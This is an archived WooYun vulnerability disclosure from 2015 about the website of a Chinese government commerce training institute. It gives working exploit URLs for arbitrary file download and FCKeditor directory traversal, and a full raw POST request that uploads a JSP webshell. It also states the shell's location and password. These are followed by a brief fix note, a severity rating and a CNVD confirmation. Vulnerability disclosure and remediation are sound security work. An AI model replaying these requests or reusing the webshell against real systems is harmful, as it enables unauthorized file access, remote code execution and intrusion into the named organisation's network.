乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
getshell可威胁内网
商务部国际商务官员研修学院http://china-aibo.cn/
1#任意文件下载
http://china-aibo.cn/piw/Api/Download.jsp?path=/WEB-INF/web.xml&fileName=web.xml
2#fck目录遍历
http://china-aibo.cn/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../
3#fck任意文件上传
POST http://china-aibo.cn/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*Referer: Accept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4UA-CPU: x86Pragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: china-aibo.cnContent-Length: 10179Connection: Keep-Alive-----------------------------7de11c161e01e4Content-Disposition: form-data; name="NewFile"; filename="E:\wooyun1.jsp"Content-Type: application/octet-streamwooyun test-----------------------------7de11c161e01e4--
一句话地址:http://china-aibo.cn/piw/Upload/File/wooyun1.jsp密码:woo0yun
正确配置fck,过滤../
危害等级:高
漏洞Rank:12
确认时间:2015-07-13 15:22
CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.
暂无